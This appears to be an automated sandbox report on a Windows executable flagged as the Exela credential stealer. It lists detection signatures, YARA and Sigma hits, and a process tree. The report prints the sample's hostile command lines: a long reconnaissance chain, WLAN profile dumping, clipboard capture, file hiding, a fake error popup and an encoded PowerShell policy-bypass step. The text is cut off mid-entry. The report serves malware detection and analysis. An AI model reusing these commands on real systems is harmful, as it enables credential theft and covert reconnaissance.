Windows Analysis Report
rename_me_before.exe

Overview

General Information

Sample name: rename_me_before.exe
Analysis ID: 1582938
MD5: 8b8040d5875e4c41ed5091f92021a16b
SHA1: 4ebb7b91e64a7193b61a0e1405847ed13563f7d5
SHA256: 7e7597691235f0ff8a8df29ee3e54ea7a69b43b4ef727adf511e7aec749dc68a
Tags: exe, user-Raidr

Detection

Python Stealer, Exela Stealer
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Capture Wi-Fi password
Yara detected Exela Stealer
Yara detected Python Stealer
AI detected suspicious sample
Bypasses PowerShell execution policy
Detected generic credential text file
Encrypted powershell cmdline option found
Found many strings related to Crypto-Wallets (likely being stolen)
Gathers network related connection and port information
Modifies existing user documents (likely ransomware behavior)
Modifies the windows firewall
Overwrites the password of the administrator account
Performs a network lookup / discovery via ARP
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Queries sensitive service information (via WMI, Win32_LogicalDisk, often done to detect sandboxes)
Queries sensitive service information (via WMI, Win32_StartupCommand, often done to detect sandboxes)
Sigma detected: Dot net compiler compiles file from suspicious location
Sigma detected: MSHTA Suspicious Execution 01
Sigma detected: Suspicious Encoded PowerShell Command Line
Sigma detected: Suspicious PowerShell Encoded Command Patterns
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to harvest and steal WLAN passwords
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Crypto Currency Wallets
Uses attrib.exe to hide files
Uses cmd line tools excessively to alter registry or file data
Uses ipconfig to lookup or modify the Windows network settings
Uses netsh to modify the Windows network and firewall settings
Uses netstat to query active network connections and open ports
Yara detected Generic Python Stealer
AV process strings found (often used to terminate AV products)
Compiles C# or VB.Net code
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to query CPU information (cpuid)
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a window with clipboard capturing capabilities
Creates files inside the system directory
Detected potential crypto function
Drops PE files
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found evasive API chain checking for process token information
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
PE file contains executable resources (Code or Archives)
PE file contains sections with non-standard names
PE file does not import any functions
Queries disk information (often used to detect virtual machines)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Queries time zone information
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Searches for the Microsoft Outlook file path
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: Console CodePage Lookup Via CHCP
Sigma detected: Dynamic .NET Compilation Via Csc.EXE
Sigma detected: PowerShell Get-Clipboard Cmdlet Via CLI
Sigma detected: Suspicious Execution of Powershell with Base64
Sigma detected: Suspicious Group And Account Reconnaissance Activity Using Net.EXE
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Very long command line found
Yara detected Credential Stealer

Classification

  • System is w10x64
  • rename_me_before.exe (PID: 1396 cmdline: "C:\Users\user\Desktop\rename_me_before.exe" MD5: 8B8040D5875E4C41ED5091F92021A16B)
    • rename_me_before.exe (PID: 3512 cmdline: "C:\Users\user\Desktop\rename_me_before.exe" MD5: 8B8040D5875E4C41ED5091F92021A16B)
      • cmd.exe (PID: 4124 cmdline: C:\Windows\system32\cmd.exe /c "ver" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 4564 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • cmd.exe (PID: 2916 cmdline: C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 1072 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • WMIC.exe (PID: 3852 cmdline: wmic csproduct get uuid MD5: C37F2F4F4B3CD128BDABCAEB2266A785)
      • cmd.exe (PID: 5664 cmdline: C:\Windows\system32\cmd.exe /c "tasklist" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 2200 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • tasklist.exe (PID: 6700 cmdline: tasklist MD5: D0A49A170E13D7F6AEBBEFED9DF88AAA)
      • cmd.exe (PID: 7028 cmdline: C:\Windows\system32\cmd.exe /c "attrib +h +s "C:\Users\user\AppData\Local\ExelaUpdateService\Exela.exe"" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 6316 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • attrib.exe (PID: 6096 cmdline: attrib +h +s "C:\Users\user\AppData\Local\ExelaUpdateService\Exela.exe" MD5: 5037D8E6670EF1D89FB6AD435F12A9FD)
      • cmd.exe (PID: 1312 cmdline: C:\Windows\system32\cmd.exe /c "mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('The Program can\x22t start because api-ms-win-crt-runtime-|l1-1-.dll is missing from your computer. Try reinstalling the program to fix this problem', 0, 'System Error', 0+16);close()"" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 5216 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • mshta.exe (PID: 2108 cmdline: mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('The Program can\x22t start because api-ms-win-crt-runtime-|l1-1-.dll is missing from your computer. Try reinstalling the program to fix this problem', 0, 'System Error', 0+16);close()" MD5: 0B4340ED812DC82CE636C00FA5C9BEF2)
      • cmd.exe (PID: 2080 cmdline: C:\Windows\system32\cmd.exe /c "tasklist" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 6812 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • tasklist.exe (PID: 1460 cmdline: tasklist MD5: D0A49A170E13D7F6AEBBEFED9DF88AAA)
      • cmd.exe (PID: 4564 cmdline: C:\Windows\system32\cmd.exe /c "cmd.exe /c chcp" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 7036 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • cmd.exe (PID: 2080 cmdline: cmd.exe /c chcp MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
          • chcp.com (PID: 6868 cmdline: chcp MD5: 33395C4732A49065EA72590B14B64F32)
      • cmd.exe (PID: 6096 cmdline: C:\Windows\system32\cmd.exe /c "cmd.exe /c chcp" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 5228 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • cmd.exe (PID: 4296 cmdline: cmd.exe /c chcp MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
          • chcp.com (PID: 7200 cmdline: chcp MD5: 33395C4732A49065EA72590B14B64F32)
      • cmd.exe (PID: 3244 cmdline: C:\Windows\system32\cmd.exe /c "tasklist /FO LIST" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 6792 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • tasklist.exe (PID: 3120 cmdline: tasklist /FO LIST MD5: D0A49A170E13D7F6AEBBEFED9DF88AAA)
      • cmd.exe (PID: 2588 cmdline: C:\Windows\system32\cmd.exe /c "powershell.exe Get-Clipboard" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 2004 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • powershell.exe (PID: 7176 cmdline: powershell.exe Get-Clipboard MD5: 04029E121A0CFA5991749937DD22A1D9)
      • cmd.exe (PID: 7244 cmdline: C:\Windows\system32\cmd.exe /c "echo ####System Info#### & systeminfo & echo ####System Version#### & ver & echo ####Host Name#### & hostname & echo ####Environment Variable#### & set & echo ####Logical Disk#### & wmic logicaldisk get caption,description,providername & echo ####User Info#### & net user & echo ####Online User#### & query user & echo ####Local Group#### & net localgroup & echo ####Administrators Info#### & net localgroup administrators & echo ####Guest User Info#### & net user guest & echo ####Administrator User Info#### & net user administrator & echo ####Startup Info#### & wmic startup get caption,command & echo ####Tasklist#### & tasklist /svc & echo ####Ipconfig#### & ipconfig/all & echo ####Hosts#### & type C:\WINDOWS\System32\drivers\etc\hosts & echo ####Route Table#### & route print & echo ####Arp Info#### & arp -a & echo ####Netstat#### & netstat -ano & echo ####Service Info#### & sc query type= service state= all & echo ####Firewallinfo#### & netsh firewall show state & netsh firewall show config" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 7264 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • systeminfo.exe (PID: 7328 cmdline: systeminfo MD5: EE309A9C61511E907D87B10EF226FDCD)
          • WmiPrvSE.exe (PID: 7408 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)
        • HOSTNAME.EXE (PID: 7544 cmdline: hostname MD5: 33AFAA43B84BDEAB12E02F9DBD2B2EE0)
        • WMIC.exe (PID: 7564 cmdline: wmic logicaldisk get caption,description,providername MD5: C37F2F4F4B3CD128BDABCAEB2266A785)
        • net.exe (PID: 7700 cmdline: net user MD5: 0BD94A338EEA5A4E1F2830AE326E6D19)
          • net1.exe (PID: 7716 cmdline: C:\Windows\system32\net1 user MD5: 55693DF2BB3CBE2899DFDDF18B4EB8C9)
        • query.exe (PID: 7732 cmdline: query user MD5: 29043BC0B0F99EAFF36CAD35CBEE8D45)
          • quser.exe (PID: 7752 cmdline: "C:\Windows\system32\quser.exe" MD5: 480868AEBA9C04CA04D641D5ED29937B)
        • net.exe (PID: 7768 cmdline: net localgroup MD5: 0BD94A338EEA5A4E1F2830AE326E6D19)
          • net1.exe (PID: 7780 cmdline: C:\Windows\system32\net1 localgroup MD5: 55693DF2BB3CBE2899DFDDF18B4EB8C9)
        • net.exe (PID: 7804 cmdline: net localgroup administrators MD5: 0BD94A338EEA5A4E1F2830AE326E6D19)
          • net1.exe (PID: 7816 cmdline: C:\Windows\system32\net1 localgroup administrators MD5: 55693DF2BB3CBE2899DFDDF18B4EB8C9)
        • net.exe (PID: 7836 cmdline: net user guest MD5: 0BD94A338EEA5A4E1F2830AE326E6D19)
          • net1.exe (PID: 7852 cmdline: C:\Windows\system32\net1 user guest MD5: 55693DF2BB3CBE2899DFDDF18B4EB8C9)
        • net.exe (PID: 7868 cmdline: net user administrator MD5: 0BD94A338EEA5A4E1F2830AE326E6D19)
          • net1.exe (PID: 7884 cmdline: C:\Windows\system32\net1 user administrator MD5: 55693DF2BB3CBE2899DFDDF18B4EB8C9)
        • WMIC.exe (PID: 7900 cmdline: wmic startup get caption,command MD5: C37F2F4F4B3CD128BDABCAEB2266A785)
        • tasklist.exe (PID: 7936 cmdline: tasklist /svc MD5: D0A49A170E13D7F6AEBBEFED9DF88AAA)
        • ipconfig.exe (PID: 7964 cmdline: ipconfig /all MD5: 62F170FB07FDBB79CEB7147101406EB8)
        • ROUTE.EXE (PID: 7988 cmdline: route print MD5: 3C97E63423E527BA8381E81CBA00B8CD)
        • ARP.EXE (PID: 8004 cmdline: arp -a MD5: 2AF1B2C042B83437A4BE82B19749FA98)
        • NETSTAT.EXE (PID: 8020 cmdline: netstat -ano MD5: 7FDDD6681EA81CE26E64452336F479E6)
        • sc.exe (PID: 8036 cmdline: sc query type= service state= all MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
        • netsh.exe (PID: 8052 cmdline: netsh firewall show state MD5: 6F1E6DD688818BC3D1391D0CC7D597EB)
        • netsh.exe (PID: 8084 cmdline: netsh firewall show config MD5: 6F1E6DD688818BC3D1391D0CC7D597EB)
      • cmd.exe (PID: 7256 cmdline: C:\Windows\system32\cmd.exe /c "netsh wlan show profiles" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 7272 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • netsh.exe (PID: 7364 cmdline: netsh wlan show profiles MD5: 6F1E6DD688818BC3D1391D0CC7D597EB)
      • cmd.exe (PID: 8164 cmdline: C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 8172 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • WMIC.exe (PID: 7220 cmdline: wmic csproduct get uuid MD5: C37F2F4F4B3CD128BDABCAEB2266A785)
      • cmd.exe (PID: 6316 cmdline: C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand [base64 EncodedCommand omitted]" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 2084 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • powershell.exe (PID: 1668 cmdline: powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand 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 MD5: 04029E121A0CFA5991749937DD22A1D9)
          • csc.exe (PID: 7304 cmdline: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\iqddoona\iqddoona.cmdline" MD5: F65B029562077B648A6A5F6A1AA76A66)
            • cvtres.exe (PID: 7352 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES71B8.tmp" "c:\Users\user\AppData\Local\Temp\iqddoona\CSCE5D39DCC87804C2589D261464B53262.TMP" MD5: C877CBB966EA5939AA2A17B6A5160950)
      • cmd.exe (PID: 5576 cmdline: C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 6792 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • WMIC.exe (PID: 7420 cmdline: wmic csproduct get uuid MD5: C37F2F4F4B3CD128BDABCAEB2266A785)
  • svchost.exe (PID: 7624 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • cleanup
No configs have been found
Source | Rule | Description | Author | Strings
00000001.00000003.1952943493.000001B1014F9000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_ExelaStealer | Yara detected Exela Stealer | Joe Security |
00000001.00000003.1952943493.000001B1014F9000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_PythonStealer | Yara detected Python Stealer | Joe Security |
00000001.00000003.1952943493.000001B1014F9000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security |
00000001.00000002.1978432003.000001B101520000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_ExelaStealer | Yara detected Exela Stealer | Joe Security |
00000001.00000002.1978432003.000001B101520000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_PythonStealer | Yara detected Python Stealer | Joe Security |

System Summary

Source: Process started; Author: Diego Perez (@darkquassar), Markus Neis, Swisscom (Improve Rule); Data: Command: mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('The Program can\x22t start because api-ms-win-crt-runtime-|l1-1-.dll is missing from your computer. Try reinstalling the program to fix this problem', 0, 'System Error', 0+16);close()", CommandLine: mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('The Program can\x22t start because api-ms-win-crt-runtime-|l1-1-.dll is missing from your computer. Try reinstalling the program to fix this problem', 0, 'System Error', 0+16);close()", CommandLine|base64offset|contains: m, Image: C:\Windows\System32\mshta.exe, NewProcessName: C:\Windows\System32\mshta.exe, OriginalFileName: C:\Windows\System32\mshta.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c "mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('The Program can\x22t start because api-ms-win-crt-runtime-|l1-1-.dll is missing from your computer. Try reinstalling the program to fix this problem', 0, 'System Error', 0+16);close()"", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 1312, ParentProcessName: cmd.exe, ProcessCommandLine: mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('The Program can\x22t start because api-ms-win-crt-runtime-|l1-1-.dll is missing from your computer. Try reinstalling the program to fix this problem', 0, 'System Error', 0+16);close()", ProcessId: 2108, ProcessName: mshta.exe
Source: Process started; Author: Florian Roth (Nextron Systems), Markus Neis, Jonhnathan Ribeiro, Daniil Yugoslavskiy, Anton Kutepov, oscd.community; Data: Command: powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand 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
Source: Process started; Author: Florian Roth (Nextron Systems); Data: Command: powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand [base64 EncodedCommand omitted]
Source: Process started; Author: frack113; Data: Command: powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand [base64 EncodedCommand omitted]
Source: Process started; Author: _pete_0, TheDFIRReport; Data: Command: chcp, CommandLine: chcp, CommandLine|base64offset|contains: r), Image: C:\Windows\System32\chcp.com, NewProcessName: C:\Windows\System32\chcp.com, OriginalFileName: C:\Windows\System32\chcp.com, ParentCommandLine: cmd.exe /c chcp, ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 2080, ParentProcessName: cmd.exe, ProcessCommandLine: chcp, ProcessId: 6868, ProcessName: chcp.com
Source: Process started; Author: Florian Roth (Nextron Systems), X__Junior (Nextron Systems); Data: Command: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\iqddoona\iqddoona.cmdline", CommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\iqddoona\iqddoona.cmdline", CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, ParentCommandLine: powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand [base64 EncodedCommand omitted]
Source: Process started; Author: Nasreddine Bencherchali (Nextron Systems); Data: Command: C:\Windows\system32\cmd.exe /c "powershell.exe Get-Clipboard", CommandLine: C:\Windows\system32\cmd.exe /c "powershell.exe Get-Clipboard", CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: "C:\Users\user\Desktop\rename_me_before.exe", ParentImage: C:\Users\user\Desktop\rename_me_before.exe, ParentProcessId: 3512, ParentProcessName: rename_me_before.exe, ProcessCommandLine: C:\Windows\system32\cmd.exe /c "powershell.exe Get-Clipboard", ProcessId: 2588, ProcessName: cmd.exe
            Source: Process startedAuthor: frack113: Data: Command: powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand 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
            Source: Process startedAuthor: Florian Roth (Nextron Systems), omkar72, @svch0st, Nasreddine Bencherchali (Nextron Systems): Data: Command: net localgroup administrators, CommandLine: net localgroup administrators, CommandLine|base64offset|contains: , Image: C:\Windows\System32\net.exe, NewProcessName: C:\Windows\System32\net.exe, OriginalFileName: C:\Windows\System32\net.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c "echo ####System Info#### & systeminfo & echo ####System Version#### & ver & echo ####Host Name#### & hostname & echo ####Environment Variable#### & set & echo ####Logical Disk#### & wmic logicaldisk get caption,description,providername & echo ####User Info#### & net user & echo ####Online User#### & query user & echo ####Local Group#### & net localgroup & echo ####Administrators Info#### & net localgroup administrators & echo ####Guest User Info#### & net user guest & echo ####Administrator User Info#### & net user administrator & echo ####Startup Info#### & wmic startup get caption,command & echo ####Tasklist#### & tasklist /svc & echo ####Ipconfig#### & ipconfig/all & echo ####Hosts#### & type C:\WINDOWS\System32\drivers\etc\hosts & echo ####Route Table#### & route print & echo ####Arp Info#### & arp -a & echo ####Netstat#### & netstat -ano & echo ####Service Info#### & sc query type= service state= all & echo ####Firewallinfo#### & netsh firewall show state & netsh firewall show config", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 7244, ParentProcessName: cmd.exe, ProcessCommandLine: net localgroup administrators, ProcessId: 7804, ProcessName: net.exe
            Source: File createdAuthor: frack113: Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 1668, TargetFilename: C:\Users\user\AppData\Local\Temp\iqddoona\iqddoona.cmdline
            Source: Process startedAuthor: Timur Zinniatullin, Daniil Yugoslavskiy, oscd.community: Data: Command: net user, CommandLine: net user, CommandLine|base64offset|contains: , Image: C:\Windows\System32\net.exe, NewProcessName: C:\Windows\System32\net.exe, OriginalFileName: C:\Windows\System32\net.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c "echo ####System Info#### & systeminfo & echo ####System Version#### & ver & echo ####Host Name#### & hostname & echo ####Environment Variable#### & set & echo ####Logical Disk#### & wmic logicaldisk get caption,description,providername & echo ####User Info#### & net user & echo ####Online User#### & query user & echo ####Local Group#### & net localgroup & echo ####Administrators Info#### & net localgroup administrators & echo ####Guest User Info#### & net user guest & echo ####Administrator User Info#### & net user administrator & echo ####Startup Info#### & wmic startup get caption,command & echo ####Tasklist#### & tasklist /svc & echo ####Ipconfig#### & ipconfig/all & echo ####Hosts#### & type C:\WINDOWS\System32\drivers\etc\hosts & echo ####Route Table#### & route print & echo ####Arp Info#### & arp -a & echo ####Netstat#### & netstat -ano & echo ####Service Info#### & sc query type= service state= all & echo ####Firewallinfo#### & netsh firewall show state & netsh firewall show config", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 7244, ParentProcessName: cmd.exe, ProcessCommandLine: net user, ProcessId: 7700, ProcessName: net.exe
            Source: Process startedAuthor: Michael Haag, Mark Woan (improvements), James Pemberton / @4A616D6573 / oscd.community (improvements): Data: Command: net user, CommandLine: net user, CommandLine|base64offset|contains: , Image: C:\Windows\System32\net.exe, NewProcessName: C:\Windows\System32\net.exe, OriginalFileName: C:\Windows\System32\net.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c "echo ####System Info#### & systeminfo & echo ####System Version#### & ver & echo ####Host Name#### & hostname & echo ####Environment Variable#### & set & echo ####Logical Disk#### & wmic logicaldisk get caption,description,providername & echo ####User Info#### & net user & echo ####Online User#### & query user & echo ####Local Group#### & net localgroup & echo ####Administrators Info#### & net localgroup administrators & echo ####Guest User Info#### & net user guest & echo ####Administrator User Info#### & net user administrator & echo ####Startup Info#### & wmic startup get caption,command & echo ####Tasklist#### & tasklist /svc & echo ####Ipconfig#### & ipconfig/all & echo ####Hosts#### & type C:\WINDOWS\System32\drivers\etc\hosts & echo ####Route Table#### & route print & echo ####Arp Info#### & arp -a & echo ####Netstat#### & netstat -ano & echo ####Service Info#### & sc query type= service state= all & echo ####Firewallinfo#### & netsh firewall show state & netsh firewall show config", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 7244, ParentProcessName: cmd.exe, ProcessCommandLine: net user, ProcessId: 7700, ProcessName: net.exe
            Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: powershell.exe Get-Clipboard, CommandLine: powershell.exe Get-Clipboard, CommandLine|base64offset|contains: ~Xn, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c "powershell.exe Get-Clipboard", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 2588, ParentProcessName: cmd.exe, ProcessCommandLine: powershell.exe Get-Clipboard, ProcessId: 7176, ProcessName: powershell.exe
            Source: Process startedAuthor: frack113: Data: Command: sc query type= service state= all, CommandLine: sc query type= service state= all, CommandLine|base64offset|contains: , Image: C:\Windows\System32\sc.exe, NewProcessName: C:\Windows\System32\sc.exe, OriginalFileName: C:\Windows\System32\sc.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c "echo ####System Info#### & systeminfo & echo ####System Version#### & ver & echo ####Host Name#### & hostname & echo ####Environment Variable#### & set & echo ####Logical Disk#### & wmic logicaldisk get caption,description,providername & echo ####User Info#### & net user & echo ####Online User#### & query user & echo ####Local Group#### & net localgroup & echo ####Administrators Info#### & net localgroup administrators & echo ####Guest User Info#### & net user guest & echo ####Administrator User Info#### & net user administrator & echo ####Startup Info#### & wmic startup get caption,command & echo ####Tasklist#### & tasklist /svc & echo ####Ipconfig#### & ipconfig/all & echo ####Hosts#### & type C:\WINDOWS\System32\drivers\etc\hosts & echo ####Route Table#### & route print & echo ####Arp Info#### & arp -a & echo ####Netstat#### & netstat -ano & echo ####Service Info#### & sc query type= service state= all & echo ####Firewallinfo#### & netsh firewall show state & netsh firewall show config", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 7244, ParentProcessName: cmd.exe, ProcessCommandLine: sc query type= service state= all, ProcessId: 8036, ProcessName: sc.exe
            Source: Process startedAuthor: frack113: Data: Command: hostname, CommandLine: hostname, CommandLine|base64offset|contains: -, Image: C:\Windows\System32\HOSTNAME.EXE, NewProcessName: C:\Windows\System32\HOSTNAME.EXE, OriginalFileName: C:\Windows\System32\HOSTNAME.EXE, ParentCommandLine: C:\Windows\system32\cmd.exe /c "echo ####System Info#### & systeminfo & echo ####System Version#### & ver & echo ####Host Name#### & hostname & echo ####Environment Variable#### & set & echo ####Logical Disk#### & wmic logicaldisk get caption,description,providername & echo ####User Info#### & net user & echo ####Online User#### & query user & echo ####Local Group#### & net localgroup & echo ####Administrators Info#### & net localgroup administrators & echo ####Guest User Info#### & net user guest & echo ####Administrator User Info#### & net user administrator & echo ####Startup Info#### & wmic startup get caption,command & echo ####Tasklist#### & tasklist /svc & echo ####Ipconfig#### & ipconfig/all & echo ####Hosts#### & type C:\WINDOWS\System32\drivers\etc\hosts & echo ####Route Table#### & route print & echo ####Arp Info#### & arp -a & echo ####Netstat#### & netstat -ano & echo ####Service Info#### & sc query type= service state= all & echo ####Firewallinfo#### & netsh firewall show state & netsh firewall show config", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 7244, ParentProcessName: cmd.exe, ProcessCommandLine: hostname, ProcessId: 7544, ProcessName: HOSTNAME.EXE
            Source: Process startedAuthor: frack113, Christopher Peacock '@securepeacock', SCYTHE '@scythe_io': Data: Command: C:\Windows\system32\cmd.exe /c "echo ####System Info#### & systeminfo & echo ####System Version#### & ver & echo ####Host Name#### & hostname & echo ####Environment Variable#### & set & echo ####Logical Disk#### & wmic logicaldisk get caption,description,providername & echo ####User Info#### & net user & echo ####Online User#### & query user & echo ####Local Group#### & net localgroup & echo ####Administrators Info#### & net localgroup administrators & echo ####Guest User Info#### & net user guest & echo ####Administrator User Info#### & net user administrator & echo ####Startup Info#### & wmic startup get caption,command & echo ####Tasklist#### & tasklist /svc & echo ####Ipconfig#### & ipconfig/all & echo ####Hosts#### & type C:\WINDOWS\System32\drivers\etc\hosts & echo ####Route Table#### & route print & echo ####Arp Info#### & arp -a & echo ####Netstat#### & netstat -ano & echo ####Service Info#### & sc query type= service state= all & echo ####Firewallinfo#### & netsh firewall show state & netsh firewall show config", CommandLine: C:\Windows\system32\cmd.exe /c "echo ####System Info#### & systeminfo & echo ####System Version#### & ver & echo ####Host Name#### & hostname & echo ####Environment Variable#### & set & echo ####Logical Disk#### & wmic logicaldisk get caption,description,providername & echo ####User Info#### & net user & echo ####Online User#### & query user & echo ####Local Group#### & net localgroup & echo ####Administrators Info#### & net localgroup administrators & echo ####Guest User Info#### & net user guest & echo ####Administrator User Info#### & net user administrator & echo ####Startup Info#### & wmic startup get caption,command & echo ####Tasklist#### & tasklist /svc & echo ####Ipconfig#### & ipconfig/all & echo ####Hosts#### & type C:\WINDOWS\System32\drivers\etc\hosts & echo ####Route Table#### & route print & 
